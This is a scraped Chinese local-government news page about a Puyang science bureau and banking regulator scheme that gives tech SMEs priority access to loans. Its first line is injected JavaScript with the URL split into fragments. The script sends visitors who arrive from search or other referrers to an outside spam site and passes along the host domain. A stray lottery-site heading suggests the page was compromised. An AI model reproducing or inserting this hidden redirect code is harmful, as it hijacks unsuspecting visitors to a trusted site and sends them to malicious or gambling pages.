var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

建立“白名单”机制,濮阳市科技局携手濮阳银保监分局金融支持科技型中小企业


发布日期:2021-07-20 09:05来源:濮阳市科学技术局 阅读次数:

  为深入实施创新驱动发展战略,进一步加强对科技型中小企业的金融服务,助力“万人助万企”活动深入开展,濮阳市科技局、濮阳银保监分局联合下发了《关于建立金融支持科技型中小企业“白名单”机制的通知》,重点支持开展“卡脖子”关键技术攻关、科技成果转化和产业化、创新平台建设的高新技术企业和科技型中小企业。

  濮阳市科技局、濮阳银保监分局根据各自职责范围,加强协同配合。濮阳市科技局负责组织推荐有融资需求的高新技术企业、科技型中小企业;濮阳银保监分局负责组织辖内银行业机构开展走访对接,按照市场化、法制化以及“应贷尽贷”的原则,对达到融资条件的高新技术企业、科技型中小企业尽快开展授信审批。

  濮阳银保监分局将对各银行业机构推进金融支持科技型中小企业“白名单”机制情况进行监测通报,对落实不力的银行业机构,将采取监管通报、监管约谈、窗口指导、现场检查等监管手段,建立倒逼机制,不断推进此项工作向纵深发展。

  目前,濮阳市科技局已根据《通知》要求,启动了全市高新技术企业、科技型中小企业融资需求征集活动。根据征集情况,将联合濮阳银保监分局适时举办政银企对接活动。